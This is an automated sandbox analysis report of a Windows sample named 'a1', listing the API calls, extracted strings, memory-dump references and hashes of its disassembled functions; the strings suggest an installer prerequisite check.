                                                                                                                                                                                                                                                                          • Instruction ID: 44c7b2a27d62b3372c66f073bad4de31f09afe79dc468e357cfd8d646c936aa6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ec8f1bf439f5dd652dc2ecadc77982944ca750996f9043b8eebc5ee022d1237
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AC08C3020122087C7304B18B948B8232DC5B04B00F014449E409C3600CB70EC008654
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(002D45F3,00000000), ref: 002D4B70
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                          • Opcode ID: 816c9c9cc4f827795a6cd19986d526834ba3a3997742f20ff002b7fe6a6b3af5
                                                                                                                                                                                                                                                                          • Instruction ID: ace8671ab90dc799fdf2dda2e03569ba2c3b2f4b51420d1649ff0de68928208c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 816c9c9cc4f827795a6cd19986d526834ba3a3997742f20ff002b7fe6a6b3af5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7621D57662010A9BDB21AF18E8027EA7798EB55321F004267FD05C7391D775ECB1CBE5
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,DF534560,00000000,?,00000000,003BA993,000000FF,?,002D2ABC,?,00000000,00000000,?,0000000D,0000000E), ref: 002F0729
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                          • Opcode ID: 82de4b4429758a08bd9ec81312e59570533ecda33c0eeacec533ef684274208e
                                                                                                                                                                                                                                                                          • Instruction ID: e0edfeafbda239fd9cbc472036b812041d1286eaa018235328f7b5a1a90640ba
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82de4b4429758a08bd9ec81312e59570533ecda33c0eeacec533ef684274208e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F112A71904A49DFD711CF68C944B9AF7F8EB09770F1087AAE429D76E1E775A9008F80
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,00000001), ref: 002C3272
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 002C32A0
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 002C3329
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • No acceptable version found. It must be installed from package., xrefs: 002C36F6
                                                                                                                                                                                                                                                                          • An acceptable version was found., xrefs: 002C36EF
                                                                                                                                                                                                                                                                          • No acceptable version found. It must be downloaded., xrefs: 002C36FD
                                                                                                                                                                                                                                                                          • No acceptable version found. It must be downloaded manually from a site., xrefs: 002C3704
                                                                                                                                                                                                                                                                          • No acceptable version found. It is already downloaded and it will be installed., xrefs: 002C3712
                                                                                                                                                                                                                                                                          • Not selected for install., xrefs: 002C3720
                                                                                                                                                                                                                                                                          • No acceptable version found., xrefs: 002C3719
                                                                                                                                                                                                                                                                          • No acceptable version found. Operating System not supported., xrefs: 002C370B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Find$CloseInit_thread_footer$FileFirstHeapProcess
                                                                                                                                                                                                                                                                          • String ID: An acceptable version was found.$No acceptable version found.$No acceptable version found. It is already downloaded and it will be installed.$No acceptable version found. It must be downloaded manually from a site.$No acceptable version found. It must be downloaded.$No acceptable version found. It must be installed from package.$No acceptable version found. Operating System not supported.$Not selected for install.
                                                                                                                                                                                                                                                                          • API String ID: 544434140-749633484
                                                                                                                                                                                                                                                                          • Opcode ID: a8ecd39a475cf527595940067565cfe3fd998b4ffe121d158b333103465a6509
                                                                                                                                                                                                                                                                          • Instruction ID: c366c88ffc61902ee682fde3ccf294c1f167bfcd6030d62009943126d3f1e93c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8ecd39a475cf527595940067565cfe3fd998b4ffe121d158b333103465a6509
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCF19D70A00646CFDB50DF28C848BAEFBB1EF45310F1887A8D8499B391DB74EA55CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001C3EF0: EnterCriticalSection.KERNEL32(0045B428,DF534560,00000000,?,?,?,?,?,?,001C3750,0037454D,000000FF), ref: 001C3F2D
                                                                                                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,?,00000001,?), ref: 001C3C64
                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 001C3D48
                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 001C3D56
                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(?), ref: 001C3D7A
                                                                                                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,00000000), ref: 001C3E65
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Global$NtdllProc_Window$AllocCriticalEnterLockSectionUnlock
                                                                                                                                                                                                                                                                          • String ID: Ad4$`)up=)u$sd4$}d4
                                                                                                                                                                                                                                                                          • API String ID: 420742265-4104157136
                                                                                                                                                                                                                                                                          • Opcode ID: 90ab1fc1545e2b714bc6de16d89cc26ab7d17a54b0146cb267b55a185e38766c
                                                                                                                                                                                                                                                                          • Instruction ID: 416c39bd8cc822082ccc00c430f3a91480ffbdfff82ae4f831762ae071783d60
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90ab1fc1545e2b714bc6de16d89cc26ab7d17a54b0146cb267b55a185e38766c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3D1BA71900209EFDB11DFA4C848FAFBBB8AF56710F14816DE821AB291D775DE01CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 002E0FAC
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 002E108B
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 002E10B5
                                                                                                                                                                                                                                                                          • GetLogicalDriveStringsW.KERNEL32(00000064,?), ref: 002E1110
                                                                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 002E112A
                                                                                                                                                                                                                                                                          • Wow64DisableWow64FsRedirection.KERNEL32(00000000,00000000), ref: 002E1327
                                                                                                                                                                                                                                                                          • Wow64RevertWow64FsRedirection.KERNEL32(00000000,00000000), ref: 002E13B1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Wow64$DriveInit_thread_footerRedirection_wcsrchr$DisableHeapLogicalProcessRevertStringsType_wcschr
                                                                                                                                                                                                                                                                          • String ID: ]%!
                                                                                                                                                                                                                                                                          • API String ID: 1522321474-1069524040
                                                                                                                                                                                                                                                                          • Opcode ID: 5bee47e5a8c5b1f5763e2d95d96c6c0d30da173ed2a1997de1fbcdac5d3257ba
                                                                                                                                                                                                                                                                          • Instruction ID: ee1b4429a28d56255bdfa33fa634319204c0e0115dfc65ee24cfaadd9550d963
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bee47e5a8c5b1f5763e2d95d96c6c0d30da173ed2a1997de1fbcdac5d3257ba
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EF1C03190019ACFDB21CF69CC84BADF7B4AF55310F4482E9E91AAB291DB709E94CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(00000000,?,00000001,80070216,?,00000000,?,?,80070216), ref: 001C35F4
                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,00000000), ref: 001C36D8
                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000,?,00000000), ref: 001C36E6
                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(?,?,00000000), ref: 001C370A
                                                                                                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(00000000,?,DF534560,00000000), ref: 001C37C1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Global$NtdllProc_Window$AllocLockUnlock
                                                                                                                                                                                                                                                                          • String ID: Ad4$sd4$}d4
                                                                                                                                                                                                                                                                          • API String ID: 3143318529-3820236411
                                                                                                                                                                                                                                                                          • Opcode ID: c1fa3a481c6b210415cf1696b343a19a04f0f7a7087838f1dca2140ec411ffa9
                                                                                                                                                                                                                                                                          • Instruction ID: eac5aa0e375661fcaa9a8fab035f271556dc3e23496fc11637738fb52a23afa1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1fa3a481c6b210415cf1696b343a19a04f0f7a7087838f1dca2140ec411ffa9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9A1ABB1904215ABDB11DFA4CC08FAEBBB9AF56710F14861DF921A7291DB34DE01CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 002B5858
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,00000000), ref: 002B5958
                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,00000000,0000002A,?,00000000), ref: 002B59F5
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000), ref: 002B5A1B
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000), ref: 002B5A65
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 002B5AE9
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirstInit_thread_footer_wcsrchr$HeapProcess
                                                                                                                                                                                                                                                                          • String ID: t=
                                                                                                                                                                                                                                                                          • API String ID: 2593539128-3560402705
                                                                                                                                                                                                                                                                          • Opcode ID: 579d39311f1699dfb83fc5272dad18ff0dd7e2ac7293d9a57d5e1d0cf3c9f696
                                                                                                                                                                                                                                                                          • Instruction ID: dd4b2b847c868448791cb21508e98bfb708193ce57a835f90586a6bd698fbf0b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 579d39311f1699dfb83fc5272dad18ff0dd7e2ac7293d9a57d5e1d0cf3c9f696
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1A1E071A10A16DFDB10DF68CC45BEEB7F8FF54324F10422DE815AB280E7B59A048B90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,00000000), ref: 00297221
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: D^4$NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI$h]4$a4
                                                                                                                                                                                                                                                                          • API String ID: 0-3939893310
                                                                                                                                                                                                                                                                          • Opcode ID: d7253686a7ecc7712c578b9d0357544214bc1d4416493647f9c7412467cc0f8c
                                                                                                                                                                                                                                                                          • Instruction ID: 602b0b4febd12657595fd0b3f477fd748e651a75ae1566ef7c1b0c5299c5939f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7253686a7ecc7712c578b9d0357544214bc1d4416493647f9c7412467cc0f8c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51C1AC71A00709AFEB14CF64CC55BEAB7F5FB89300F008299E556A72D1DB74AA49CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 6A57B8D2: GetLastError.KERNEL32(?,00000008,6A583C9D), ref: 6A57B8D6
                                                                                                                                                                                                                                                                            • Part of subcall function 6A57B8D2: SetLastError.KERNEL32(00000000,00000001,FFFFFFFF,000000FF), ref: 6A57B978
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,?,?,?,?,6A57C315,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6A5867A0
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6A57C315,?,?,?,00000055,?,-00000050,?,?), ref: 6A5867CB
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6A58685F
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6A58686D
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6A58692E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                                                                                                                                          • String ID: utf8
                                                                                                                                                                                                                                                                          • API String ID: 4147378913-905460609
                                                                                                                                                                                                                                                                          • Opcode ID: 072f60b28882f2d1c245b06d34dcffac6b46290870e7ac0e6466c81bef0e9f7f
                                                                                                                                                                                                                                                                          • Instruction ID: 5b7b406194aaa0887f8dffd52b44aa086d825b89cdbeefee97d01a8d0a99187a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 072f60b28882f2d1c245b06d34dcffac6b46290870e7ac0e6466c81bef0e9f7f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C77105B1610322BAE725DB35CC45EAA73E8EF45304F024439E905EB981EF70ED4087A1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,00000000,-00000010,?,DF534560,?,00000000,00000000), ref: 002F4701
                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,00000000), ref: 002F471C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1690352074-0
                                                                                                                                                                                                                                                                          • Opcode ID: efa7d842c8ba66010095ad0edd55e17bca6e7e1ff023dd22dbaf49680182ad05
                                                                                                                                                                                                                                                                          • Instruction ID: 64435495e0f058e56dd44ebb06ce289671996c23eec853e610b84713d902f47c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efa7d842c8ba66010095ad0edd55e17bca6e7e1ff023dd22dbaf49680182ad05
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F715771D0128DDFDB11DFA8C848AEEBBB8FF09314F148269E915AB291DB749A04CB50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000C,00348DA1,00000000,?,00348F39,00000000,?,?,001C5514,?), ref: 00348E87
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,?,001C5514,?), ref: 00348EAE
                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,001C5514,?), ref: 00348EB5
                                                                                                                                                                                                                                                                          • InitializeSListHead.KERNEL32(00000000,?,?,001C5514,?), ref: 00348EC2
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,001C5514,?), ref: 00348ED7
